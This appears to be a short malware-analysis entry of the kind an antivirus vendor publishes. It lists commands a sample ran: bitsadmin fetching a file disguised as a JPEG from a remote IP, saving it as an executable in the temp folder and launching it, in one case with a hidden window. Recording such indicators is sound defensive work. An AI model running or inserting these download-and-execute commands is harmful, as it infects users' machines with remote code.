Technical Information
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://185.165.29.36/sexy.jpg" "%LOCALAPPDATA%\Temp/AdksAOP.exe" && "%LOCALAPPDATA%\Temp/AdksAOP.exe"
- '18#.#65.29.36':80
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://185.165.29.36/sexy.jpg" "%LOCALAPPDATA%\Temp/AdksAOP.exe" && "%LOCALAPPDATA%\Temp/AdksAOP.exe"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://185.165.29.36/sexy.jpg" "%LOCALAPPDATA%\Temp/AdksAOP.exe"